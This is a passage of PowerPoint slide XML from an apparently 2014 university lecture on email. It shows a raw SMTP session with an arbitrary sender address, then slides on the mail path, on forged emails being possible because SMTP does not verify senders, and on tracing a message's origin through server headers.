              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>250 smtp5.sgsi.ucl.ac.be</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>MAIL FROM: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>this-can-be@anythi.ng</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>250 2.1.0 Ok</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>RCPT TO: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>marco.canini@uclouvain.be</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>250 2.1.5 Ok</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>DATA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>354 End data with &lt;CR&gt;&lt;LF&gt;.&lt;CR&gt;&lt;LF&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Hi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>250 2.0.0 Ok: queued as 1A000198046</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>QUIT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>221 2.0.0 Bye</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Connection closed by foreign host.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Right Arrow 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="2590800"/>
            <a:ext cx="695325" cy="419100"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5"/>
          </a:solidFill>
          <a:ln w="19050"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9" name="Right Arrow 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="3048000"/>
            <a:ext cx="695325" cy="419100"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5"/>
          </a:solidFill>
          <a:ln w="19050"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10" name="Right Arrow 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="3581400"/>
            <a:ext cx="695325" cy="419100"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5"/>
          </a:solidFill>
          <a:ln w="19050"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11" name="Right Arrow 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="4114800"/>
            <a:ext cx="695325" cy="419100"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5"/>
          </a:solidFill>
          <a:ln w="19050"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12" name="Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="4800600"/>
            <a:ext cx="695325" cy="419100"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5"/>
          </a:solidFill>
          <a:ln w="19050"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13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="5410200"/>
            <a:ext cx="695325" cy="419100"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5"/>
          </a:solidFill>
          <a:ln w="19050" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="722451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r>
              <a:rPr lang="en-US"/>
              <a:t>Mail Path</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="384003" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The message is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>accepted by and stored </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SMTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>That server will </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>send </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>another server closer to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>destination</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>At its destination it will be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>delivered </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>recipient’s mailbox</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Forged Emails</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386051" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>As Basic SMTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>does not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>perform any verification of the sender’s address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>it is easy to forge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>mails</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mainly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>used for:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spamming</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, phishing, propagating </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>rumors</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Each </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>server adds a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>mail</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr 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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Limitation: originating system can be traced</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="400387" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The server that receives the mail initially notes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The contents of the HELO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>command</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The IP address of the mail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>sender</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The receiving </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>time</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>With these data, it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>is possible to trace the originating system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often easy to find the author of the mail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Author can be identified by the system log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Much harder if the system doesn’t log users</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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Tracking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1509668"/>
            <a:ext cx="7982749" cy="4738732"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Delivered-To: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>m.canini.c@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
